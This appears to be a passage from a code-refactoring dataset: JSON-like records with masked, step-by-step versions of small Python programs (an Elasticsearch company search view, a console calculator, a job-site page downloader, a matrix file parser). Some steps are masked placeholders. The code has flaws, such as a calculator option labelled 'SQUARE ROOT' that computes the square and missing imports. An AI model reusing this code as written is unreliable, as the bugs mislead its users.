i.company_name\n data['crn'] = i.crn\n try:\n data['former_name'] = str(i.former_name)\n except:\n pass\n data['organization_type'] = i.organization_type\n data['faren'] = i.faren\n data['registered_capital'] = i.registered_capital\n data['company_type'] = i.company_type\n data['registration_state'] = i.registration_state\n data['searched_by'] = str(i.searched_by)\n data['data_count'] = i.data_count\n # print(data)\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n\nclass CodeSearch(View):\n def get(self, request):\n key_words = request.GET.get('code', '')\n print(key_words)\n search = Search_1()\n data = search.get_data(key_words)\n # text = {'code': key_words}\n # print(json.dumps(text))\n print(data)\n return JsonResponse(data)\n\n\n\nif __name__ == '__main__':\n # client = Elasticsearch(hosts=[\"127.0.0.1\"])\n # 创建相关实例\n es = Elasticsearch(hosts=[\"127.0.0.1\"])\n # using参数是指定Elasticsearch实例对象,index指定索引,可以缩小范围,index接受一个列表作为多个索引,且也可以用正则表示符合某种规则的索引都可以被索引,如index=[\"bank\", \"banner\", \"country\"]又如index=[\"b*\"]后者可以同时索引所有以b开头的索引,search中同样可以指定具体doc-type\n # s = Search(using=client, index=\"zntg_5\")\n # q = {\"query\": {\"match\": {\"name\": \"easy\"}}}\n # res = es.Search(body=q)\n # print(res)\n s = Search(index='zntg_2').using(es).query('match', company_name='延安一正启源科技发展股份有限公司')\n # for i in s[0]:\n # print(i.company_name)\n # print(i.company_type)\n res = s.execute()\n # print(res)\n # res = es.get(index=\"zntg_5\", doc_type=\"company\", id='AWQ7fKZzZ2odEMYJXOY0')\n # print(res[\"hits\"][\"hits\"][0]['_source'])\n a = res[\"hits\"][\"hits\"][0]['_source']\n print(a['former_name'])\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('Select an operation to perform: ')
print('1.ADD')
print('2.SUBTRACT')
print('3.MULTIPLY')
print('4.DIVIDE')
print('5.SQUARE ROOT')
<|reserved_special_token_0|>
if operation == '1':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) + int(b)
print('The sum is ' + str(result))
elif operation == '2':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) - int(b)
print('The difference is ' + str(result))
elif operation == '3':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) * int(b)
print('The product is ' + str(result))
elif operation == '4':
a = input('Enter first number: ')
b = input('Enter second number: ')
result = int(a) / int(b)
print('The result is ' + str(result))
elif operation == '5':
a = input('Enter number:')
result = int(a) * int(a)
print('The square of ' + a + ' is ' + str(result))
else:
print('Invalid entry!')
<|reserved_special_token_1|>
# Simple interactive calculator: add, subtract, multiply, divide, square.
print('Select an operation to perform: ')
print('1.ADD')
print('2.SUBTRACT')
print('3.MULTIPLY')
print('4.DIVIDE')
# Fix: the menu said "SQUARE ROOT" but option 5 computes the square (a*a).
print('5.SQUARE')
operation = input()
if operation == '1':
    a = input('Enter first number: ')
    b = input('Enter second number: ')
    result = int(a) + int(b)
    print('The sum is ' + str(result))
elif operation == '2':
    a = input('Enter first number: ')
    b = input('Enter second number: ')
    result = int(a) - int(b)
    print('The difference is ' + str(result))
elif operation == '3':
    a = input('Enter first number: ')
    b = input('Enter second number: ')
    result = int(a) * int(b)
    print('The product is ' + str(result))
elif operation == '4':
    a = input('Enter first number: ')
    b = input('Enter second number: ')
    if int(b) == 0:
        # Fix: guard against an unhandled ZeroDivisionError.
        print('Cannot divide by zero!')
    else:
        result = int(a) / int(b)
        print('The result is ' + str(result))
elif operation == '5':
    a = input('Enter number:')
    result = int(a) * int(a)
    print('The square of ' + a + ' is ' + str(result))
else:
    print('Invalid entry!')
<|reserved_special_token_1|>
# HOW TO BUILD A SIMPLE CALCULATOR
# Menu-driven: add, subtract, multiply, divide, square.
# Fixes: option 5 was labelled "SQUARE ROOT" but computes the square (a*a);
# division by zero was unhandled; tab/space indentation mix normalized.
print("Select an operation to perform: ")
print("1.ADD")
print("2.SUBTRACT")
print("3.MULTIPLY")
print("4.DIVIDE")
print("5.SQUARE")

operation = input()
if operation == "1":
    a = input("Enter first number: ")
    b = input("Enter second number: ")
    result = int(a) + int(b)
    print("The sum is " + str(result))
elif operation == "2":
    a = input("Enter first number: ")
    b = input("Enter second number: ")
    result = int(a) - int(b)
    print("The difference is " + str(result))
elif operation == "3":
    a = input("Enter first number: ")
    b = input("Enter second number: ")
    result = int(a) * int(b)
    print("The product is " + str(result))
elif operation == "4":
    a = input("Enter first number: ")
    b = input("Enter second number: ")
    if int(b) == 0:
        # Guard against an unhandled ZeroDivisionError.
        print("Cannot divide by zero!")
    else:
        result = int(a) / int(b)
        print("The result is " + str(result))
elif operation == "5":
    a = input("Enter number:")
    result = int(a) * int(a)
    print("The square of " + a + " is " + str(result))
else:
    print("Invalid entry!")
|
flexible
|
{
"blob_id": "ea35180daecb8ca4b9bd351a949a4757b97322ec",
"index": 2819,
"step-1": "<mask token>\n",
"step-2": "print('Select an operation to perform: ')\nprint('1.ADD')\nprint('2.SUBTRACT')\nprint('3.MULTIPLY')\nprint('4.DIVIDE')\nprint('5.SQUARE ROOT')\n<mask token>\nif operation == '1':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) + int(b)\n print('The sum is ' + str(result))\nelif operation == '2':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) - int(b)\n print('The difference is ' + str(result))\nelif operation == '3':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) * int(b)\n print('The product is ' + str(result))\nelif operation == '4':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) / int(b)\n print('The result is ' + str(result))\nelif operation == '5':\n a = input('Enter number:')\n result = int(a) * int(a)\n print('The square of ' + a + ' is ' + str(result))\nelse:\n print('Invalid entry!')\n",
"step-3": "print('Select an operation to perform: ')\nprint('1.ADD')\nprint('2.SUBTRACT')\nprint('3.MULTIPLY')\nprint('4.DIVIDE')\nprint('5.SQUARE ROOT')\noperation = input()\nif operation == '1':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) + int(b)\n print('The sum is ' + str(result))\nelif operation == '2':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) - int(b)\n print('The difference is ' + str(result))\nelif operation == '3':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) * int(b)\n print('The product is ' + str(result))\nelif operation == '4':\n a = input('Enter first number: ')\n b = input('Enter second number: ')\n result = int(a) / int(b)\n print('The result is ' + str(result))\nelif operation == '5':\n a = input('Enter number:')\n result = int(a) * int(a)\n print('The square of ' + a + ' is ' + str(result))\nelse:\n print('Invalid entry!')\n",
"step-4": "#HOW TO BUILD A SIMPLE CALCULATOR\r\n#1.ADD\r\n#2.SUBTRACT\r\n#3.MULTIPLY\r\n#4.DIVIDE\r\n\r\nprint(\"Select an operation to perform: \")\r\nprint(\"1.ADD\")\r\nprint(\"2.SUBTRACT\")\r\nprint(\"3.MULTIPLY\")\r\nprint(\"4.DIVIDE\")\r\nprint(\"5.SQUARE ROOT\")\r\n\r\noperation=input()\r\nif operation==\"1\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)+int(b)\r\n\tprint(\"The sum is \"+str(result))\r\nelif operation==\"2\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)-int(b)\r\n\tprint(\"The difference is \"+str(result))\r\nelif operation==\"3\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)*int(b)\r\n\tprint(\"The product is \"+str(result))\r\nelif operation==\"4\":\r\n\ta=input(\"Enter first number: \")\r\n\tb=input(\"Enter second number: \")\r\n\tresult=int(a)/int(b)\r\n\tprint(\"The result is \"+str(result))\r\nelif operation==\"5\":\r\n a=input(\"Enter number:\")\r\n result=int(a)*int(a)\r\n print(\"The square of \"+a+ \" is \"+str(result))\r\nelse:\r\n\tprint(\"Invalid entry!\")\r\n\r\n\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding=utf-8
class HtmlDownload(object):
    """Fetch a Zhaopin job-search result page as HTML."""

    @staticmethod
    def html_download(city, keyWords, pages):
        """Return the page HTML for the given search, or None on a non-200 status.

        city/keyWords/pages are forwarded as the jl/kw/pages query parameters.
        Fixes: `urlencode` was never imported (NameError at call time), and the
        method took no `self` — @staticmethod makes both class- and
        instance-level calls work.
        NOTE(review): `requests` is also not imported anywhere visible in this
        file — confirm the module-level imports.
        """
        from urllib.parse import urlencode  # stdlib; original relied on an unseen import
        paras = {
            'jl': city,
            'kw': keyWords,
            'pages': pages,
            'isadv': 0,
        }
        url = "http://sou.zhaopin.com/jobs/searchresult.ashx?" + urlencode(paras)
        response = requests.get(url)
        if response.status_code == 200:
            return response.text
        return None
|
normal
|
{
"blob_id": "e33aca56e4c9f82779278e836308c2e22d3356e2",
"index": 3770,
"step-1": "<mask token>\n",
"step-2": "class HtmlDownload(object):\n <mask token>\n <mask token>\n",
"step-3": "class HtmlDownload(object):\n <mask token>\n\n def html_download(city, keyWords, pages):\n paras = {'jl': city, 'kw': keyWords, 'pages': pages, 'isadv': 0}\n url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?' + urlencode(\n paras)\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n else:\n return None\n",
"step-4": "class HtmlDownload(object):\n \"\"\"docstring for HtmlDownload\"\"\"\n\n def html_download(city, keyWords, pages):\n paras = {'jl': city, 'kw': keyWords, 'pages': pages, 'isadv': 0}\n url = 'http://sou.zhaopin.com/jobs/searchresult.ashx?' + urlencode(\n paras)\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n else:\n return None\n",
"step-5": "# coding=utf-8\nclass HtmlDownload(object):\n\t\"\"\"docstring for HtmlDownload\"\"\"\n\n\tdef html_download(city, keyWords, pages):\n # root URL\n\t paras = {\n\t 'jl': city,\n\t 'kw': keyWords,\n\t 'pages': pages,\n\t 'isadv': 0\n\t }\n\t url = \"http://sou.zhaopin.com/jobs/searchresult.ashx?\" + urlencode(paras)\n\t response = requests.get(url)\n\t if response.status_code == 200:\n\t return response.text\n\t else:\n\t return None",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import re
from mapa import graficar_lista, graficar_matriz
class nodo:
    """One grid cell: column/row position plus display name and color."""

    def __init__(self, x, y, n, c):
        # Positional parameter names (x, y, n, c) are part of the callers'
        # contract and are kept unchanged.
        self.columna, self.fila = x, y
        self.nombre, self.color = n, c
# Line-classification patterns for the .lfp matrix format.
# Fix: the original character classes were written as [M|m], which also
# (unintentionally) matched a literal '|'; [Mm] keeps only the
# case-insensitive intent.
pattern_matriz = r"[Mm][Aa][Tt][Rr][Ii][Zz]\s*\(.*,.*,.*,.*,.*\)\{"
pattern_fila = r"[Ff][Ii][Ll][Aa]\s*\(.*\)\s*.*;"
pattern_nodo = r"[Nn][Oo][Dd][Oo]\s*\(.*,.*,.*\).*;"
pattern_defecto = r"\}\s*[Dd][Ee][Ff][Ee][Cc][Tt][Oo]\s*\(.*\).*"

# Parsed MATRIZ(...) header fields, filled in by leer_archivo_matriz.
propiedades = {
    'fila': '',
    'columna': '',
    'nombre_matriz': '',
    'forma_nodo': '',
    'matriz_doble': '',
}
# All nodo objects discovered while parsing (FILA and NODO lines).
nodos = []
# Defaults applied by a DEFECTO(...) line to '#' placeholders.
nombre_def = ""
color_def = ""
def leer_archivo_matriz(path):
    """Parse the .lfp matrix file at *path* and render it via graficar_matriz.

    Recognized line kinds:
      MATRIZ(fila, columna, 'nombre', forma, doble){  -> fills `propiedades`
      FILA('n1', 'n2', ...) color;                    -> one `nodo` per name
      NODO(col, fila, 'nombre') color;                -> a single positioned `nodo`
      } DEFECTO('nombre') color;                      -> defaults for '#' placeholders

    Side effects: mutates the module-level `propiedades` dict and `nodos`
    list, then calls `graficar_matriz((propiedades, mat))`.
    """
    # Fix: these were previously assigned only inside the DEFECTO branch, so
    # a file without a DEFECTO line (or without '#' placeholders) raised
    # UnboundLocalError when building the default grid below.
    nombre_def = ""
    color_def = ""
    with open(path, 'r', encoding='utf-8') as f:
        lineas = f.readlines()
    num_fila = 0
    for linea in lineas:
        if re.search(pattern_matriz, linea):
            # MATRIZ header: five comma-separated fields inside the parens.
            campos = re.findall(r"\(.*,.*,.*,.*,.*\)", linea)[0]
            campos = campos.replace("(", "").replace(")", "")
            partes = campos.split(",")
            propiedades['fila'] = partes[0].replace(" ", "")
            propiedades['columna'] = partes[1].replace(" ", "")
            propiedades['nombre_matriz'] = partes[2].replace("'", "").replace(" ", "")
            propiedades['forma_nodo'] = partes[3].replace(" ", "")
            propiedades['matriz_doble'] = partes[4].replace(" ", "")
        elif re.search(pattern_fila, linea):
            # Text after the ')' is the color shared by every node in the row.
            color_fila = re.findall(r"\).*", linea)[0]
            color_fila = color_fila.replace(")", " ").replace(";", "").replace(" ", "")
            nombres = re.findall(r"\(.*\)", linea)[0]
            nombres = nombres.replace("(", "").replace(")", "").replace(";", "").replace(" ", "")
            for num, nom in enumerate(nombres.split(",")):
                nodos.append(nodo(num, num_fila, nom.replace("'", ""), color_fila))
            num_fila = num_fila + 1
        elif re.search(pattern_nodo, linea):
            # NODO uses 1-based coordinates in the file; store them 0-based.
            partes = re.findall(r"\(.*,.*,.*\).*;", linea)[0]
            partes = partes.replace("(", "").replace(")", ",").replace(";", "")
            partes = partes.split(",")
            col = int(partes[0].replace(" ", "")) - 1
            fila = int(partes[1].replace(" ", "")) - 1
            nom = partes[2].replace("'", "").replace(" ", "")
            color = partes[3].replace(" ", "")
            nodos.append(nodo(col, fila, nom, color))
        elif re.search(pattern_defecto, linea):
            partes = re.findall(r"\(.*\).*", linea)[0]
            partes = partes.replace("(", "").replace(")", ",").replace(";", "")
            partes = partes.split(",")
            nombre_def = partes[0].replace("'", "").replace(" ", "")
            color_def = partes[1].replace(" ", "")
            # Apply the defaults to every '#' placeholder seen so far.
            for nod in nodos:
                if nod.nombre == "#":
                    nod.nombre = nombre_def
                if nod.color == "#":
                    nod.color = color_def
    # Build the default-filled grid.  NOTE(review): the outer range uses
    # 'columna' and the inner 'fila', matching the original code — confirm
    # the header really stores (rows, cols) in that order.
    mat = []
    for i in range(int(propiedades["columna"])):
        mat.append([])
        for j in range(int(propiedades["fila"])):
            mat[i].append(nodo(str(j), str(i), nombre_def, color_def))
    # Overlay explicitly declared nodes onto the defaults.
    for i in range(int(propiedades["columna"])):
        for j in range(int(propiedades["fila"])):
            for k in nodos:
                if mat[i][j].fila == str(int(k.fila)) and mat[i][j].columna == str(int(k.columna)):
                    mat[i][j] = k
    graficar_matriz((propiedades, mat))
|
normal
|
{
"blob_id": "70373c74e459efb2a310d94ae906910423e8bfd4",
"index": 6631,
"step-1": "<mask token>\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\n<mask token>\n\n\ndef leer_archivo_matriz(path):\n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = ''\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall('\\\\(.*,.*,.*,.*,.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n separados[4] = separados[4].replace(' ', '')\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = separados[4]\n elif re.search(pattern_fila, i):\n separado2 = re.findall('\\\\).*', i)\n separados2 = separado2[0].replace(')', ' ')\n separados2 = separados2.replace(';', '')\n separados2 = separados2.replace(' ', '')\n separado = re.findall('\\\\(.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = separados.replace(';', '')\n separados = separados.replace(' ', '')\n separados = re.split(',', separados)\n num = 0\n for nom in separados:\n nom = nom.replace(\"'\", '')\n nom = nom.replace(' ', '')\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num + 1\n num_fila = num_fila + 1\n elif re.search(pattern_nodo, i):\n separado = re.findall('\\\\(.*,.*,.*\\\\).*;', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = 
separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n nodos.append(nodo(int(separados[0]) - 1, int(separados[1]) -\n 1, separados[2], separados[3]))\n elif re.search(pattern_defecto, i):\n separado = re.findall('\\\\(.*\\\\).*', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(\"'\", '')\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n for nod in nodos:\n if nod.nombre == '#':\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == '#':\n nod.color = separados[1]\n color_def = separados[1]\n mat = []\n for i in range(0, int(propiedades['columna'])):\n mat.append([])\n for j in range(0, int(propiedades['fila'])):\n mat[i].append(nodo(str(j), str(i), nombre_def, color_def))\n for i in range(0, int(propiedades['columna'])):\n for j in range(0, int(propiedades['fila'])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j\n ].columna == str(int(k.columna)):\n mat[i][j] = k\n matriz = propiedades, mat\n graficar_matriz(matriz)\n",
"step-3": "<mask token>\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\npattern_matriz = '[M|m][A|a][T|t][R|r][I|i][Z|z]\\\\s*\\\\(.*,.*,.*,.*,.*\\\\)\\\\{'\npattern_fila = '[F|f][I|i][L|l][A|a]\\\\s*\\\\(.*\\\\)\\\\s*.*;'\npattern_nodo = '[N|n][O|o][D|d][O|o]\\\\s*\\\\(.*,.*,.*\\\\).*;'\npattern_defecto = '\\\\}\\\\s*[D|d][E|e][F|f][E|e][C|c][T|t][O|o]\\\\s*\\\\(.*\\\\).*'\npropiedades = {'fila': '', 'columna': '', 'nombre_matriz': '', 'forma_nodo':\n '', 'matriz_doble': ''}\nnodos = []\nnombre_def = ''\ncolor_def = ''\n\n\ndef leer_archivo_matriz(path):\n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = ''\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall('\\\\(.*,.*,.*,.*,.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n separados[4] = separados[4].replace(' ', '')\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = separados[4]\n elif re.search(pattern_fila, i):\n separado2 = re.findall('\\\\).*', i)\n separados2 = separado2[0].replace(')', ' ')\n separados2 = separados2.replace(';', '')\n separados2 = separados2.replace(' ', '')\n separado = re.findall('\\\\(.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = separados.replace(';', '')\n separados = separados.replace(' ', '')\n separados = re.split(',', separados)\n num = 0\n for nom in separados:\n nom = nom.replace(\"'\", '')\n nom = 
nom.replace(' ', '')\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num + 1\n num_fila = num_fila + 1\n elif re.search(pattern_nodo, i):\n separado = re.findall('\\\\(.*,.*,.*\\\\).*;', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n nodos.append(nodo(int(separados[0]) - 1, int(separados[1]) -\n 1, separados[2], separados[3]))\n elif re.search(pattern_defecto, i):\n separado = re.findall('\\\\(.*\\\\).*', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(\"'\", '')\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n for nod in nodos:\n if nod.nombre == '#':\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == '#':\n nod.color = separados[1]\n color_def = separados[1]\n mat = []\n for i in range(0, int(propiedades['columna'])):\n mat.append([])\n for j in range(0, int(propiedades['fila'])):\n mat[i].append(nodo(str(j), str(i), nombre_def, color_def))\n for i in range(0, int(propiedades['columna'])):\n for j in range(0, int(propiedades['fila'])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j\n ].columna == str(int(k.columna)):\n mat[i][j] = k\n matriz = propiedades, mat\n graficar_matriz(matriz)\n",
"step-4": "import re\nfrom mapa import graficar_lista, graficar_matriz\n\n\nclass nodo:\n\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\npattern_matriz = '[M|m][A|a][T|t][R|r][I|i][Z|z]\\\\s*\\\\(.*,.*,.*,.*,.*\\\\)\\\\{'\npattern_fila = '[F|f][I|i][L|l][A|a]\\\\s*\\\\(.*\\\\)\\\\s*.*;'\npattern_nodo = '[N|n][O|o][D|d][O|o]\\\\s*\\\\(.*,.*,.*\\\\).*;'\npattern_defecto = '\\\\}\\\\s*[D|d][E|e][F|f][E|e][C|c][T|t][O|o]\\\\s*\\\\(.*\\\\).*'\npropiedades = {'fila': '', 'columna': '', 'nombre_matriz': '', 'forma_nodo':\n '', 'matriz_doble': ''}\nnodos = []\nnombre_def = ''\ncolor_def = ''\n\n\ndef leer_archivo_matriz(path):\n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = ''\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall('\\\\(.*,.*,.*,.*,.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n separados[4] = separados[4].replace(' ', '')\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = separados[4]\n elif re.search(pattern_fila, i):\n separado2 = re.findall('\\\\).*', i)\n separados2 = separado2[0].replace(')', ' ')\n separados2 = separados2.replace(';', '')\n separados2 = separados2.replace(' ', '')\n separado = re.findall('\\\\(.*\\\\)', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', '')\n separados = separados.replace(';', '')\n separados = separados.replace(' ', '')\n separados = re.split(',', separados)\n num = 0\n for nom in 
separados:\n nom = nom.replace(\"'\", '')\n nom = nom.replace(' ', '')\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num + 1\n num_fila = num_fila + 1\n elif re.search(pattern_nodo, i):\n separado = re.findall('\\\\(.*,.*,.*\\\\).*;', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n separados[2] = separados[2].replace(\"'\", '')\n separados[2] = separados[2].replace(' ', '')\n separados[3] = separados[3].replace(' ', '')\n nodos.append(nodo(int(separados[0]) - 1, int(separados[1]) -\n 1, separados[2], separados[3]))\n elif re.search(pattern_defecto, i):\n separado = re.findall('\\\\(.*\\\\).*', i)\n separados = separado[0].replace('(', '')\n separados = separados.replace(')', ',')\n separados = separados.replace(';', '')\n separados = re.split(',', separados)\n separados[0] = separados[0].replace(\"'\", '')\n separados[0] = separados[0].replace(' ', '')\n separados[1] = separados[1].replace(' ', '')\n for nod in nodos:\n if nod.nombre == '#':\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == '#':\n nod.color = separados[1]\n color_def = separados[1]\n mat = []\n for i in range(0, int(propiedades['columna'])):\n mat.append([])\n for j in range(0, int(propiedades['fila'])):\n mat[i].append(nodo(str(j), str(i), nombre_def, color_def))\n for i in range(0, int(propiedades['columna'])):\n for j in range(0, int(propiedades['fila'])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j\n ].columna == str(int(k.columna)):\n mat[i][j] = k\n matriz = propiedades, mat\n graficar_matriz(matriz)\n",
"step-5": "import re\nfrom mapa import graficar_lista, graficar_matriz\n\nclass nodo:\n def __init__(self, x, y, n, c):\n self.columna = x\n self.fila = y\n self.nombre = n\n self.color = c\n\n\npattern_matriz = r\"[M|m][A|a][T|t][R|r][I|i][Z|z]\\s*\\(.*,.*,.*,.*,.*\\)\\{\"\npattern_fila = r\"[F|f][I|i][L|l][A|a]\\s*\\(.*\\)\\s*.*;\"\npattern_nodo = r\"[N|n][O|o][D|d][O|o]\\s*\\(.*,.*,.*\\).*;\"\npattern_defecto = r\"\\}\\s*[D|d][E|e][F|f][E|e][C|c][T|t][O|o]\\s*\\(.*\\).*\"\n\npropiedades = {\n 'fila' : '',\n 'columna' : '',\n 'nombre_matriz' : '',\n 'forma_nodo' : '',\n 'matriz_doble': '',\n}\n\nnodos = []\nnombre_def = \"\"\ncolor_def = \"\"\ndef leer_archivo_matriz(path): \n with open(path, 'r', encoding='utf-8') as f:\n lineas = f.readlines()\n num_fila = 0\n estado = \"\"\n for i in lineas:\n if re.search(pattern_matriz, i):\n separado = re.findall(r\"\\(.*,.*,.*,.*,.*\\)\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\"\")\n separados = re.split(r\",\",separados)\n separados[0] = separados[0].replace(\" \",\"\")\n separados[1] = separados[1].replace(\" \",\"\")\n separados[2] = separados[2].replace(\"'\",\"\")\n separados[2] = separados[2].replace(\" \",\"\")\n separados[3] = separados[3].replace(\" \",\"\")\n separados[4] = separados[4].replace(\" \",\"\")\n\n #Asignar Variables al diccionario\n propiedades['fila'] = separados[0]\n propiedades['columna'] = separados[1]\n propiedades['nombre_matriz'] = separados[2]\n propiedades['forma_nodo'] = separados[3]\n propiedades['matriz_doble'] = separados[4]\n\n elif re.search(pattern_fila, i):\n separado2 = re.findall(r\"\\).*\",i)\n separados2 = separado2[0].replace(\")\",\" \")\n separados2 = separados2.replace(\";\",\"\")\n separados2 = separados2.replace(\" \",\"\")\n\n separado = re.findall(r\"\\(.*\\)\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\"\")\n separados = separados.replace(\";\",\"\")\n separados = 
separados.replace(\" \",\"\")\n\n separados = re.split(r\",\",separados)\n num = 0\n for nom in separados:\n nom = nom.replace(\"'\", \"\")\n nom = nom.replace(\" \", \"\")\n nodos.append(nodo(num, num_fila, nom, separados2))\n num = num+1 \n\n num_fila = num_fila + 1\n\n elif re.search(pattern_nodo, i):\n separado = re.findall(r\"\\(.*,.*,.*\\).*;\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\",\")\n separados = separados.replace(\";\",\"\")\n\n separados = re.split(r\",\",separados)\n separados[0] = separados[0].replace(\" \",\"\")\n separados[1] = separados[1].replace(\" \",\"\")\n separados[2] = separados[2].replace(\"'\",\"\")\n separados[2] = separados[2].replace(\" \",\"\")\n separados[3] = separados[3].replace(\" \",\"\")\n\n nodos.append(nodo(int(separados[0])-1, int(separados[1])-1, separados[2], separados[3]))\n \n elif re.search(pattern_defecto, i):\n separado = re.findall(r\"\\(.*\\).*\",i)\n separados = separado[0].replace(\"(\",\"\")\n separados = separados.replace(\")\",\",\")\n separados = separados.replace(\";\",\"\")\n\n separados = re.split(r\",\",separados)\n separados[0] = separados[0].replace(\"'\",\"\")\n separados[0] = separados[0].replace(\" \",\"\")\n separados[1] = separados[1].replace(\" \",\"\")\n\n for nod in nodos:\n if nod.nombre == \"#\":\n nod.nombre = separados[0]\n nombre_def = separados[0]\n if nod.color == \"#\":\n nod.color = separados[1]\n color_def = separados[1]\n \n mat = []\n for i in range(0,int(propiedades[\"columna\"])):\n mat.append([])\n for j in range(0, int(propiedades[\"fila\"])):\n mat[i].append(nodo(str(j),str(i),nombre_def, color_def))\n \n for i in range(0,int(propiedades[\"columna\"])):\n for j in range(0, int(propiedades[\"fila\"])):\n for k in nodos:\n if mat[i][j].fila == str(int(k.fila)) and mat[i][j].columna == str(int(k.columna)):\n mat[i][j] = k\n \n # for i in range(0,int(propiedades[\"columna\"])):\n # for j in range(0, int(propiedades[\"fila\"])):\n # 
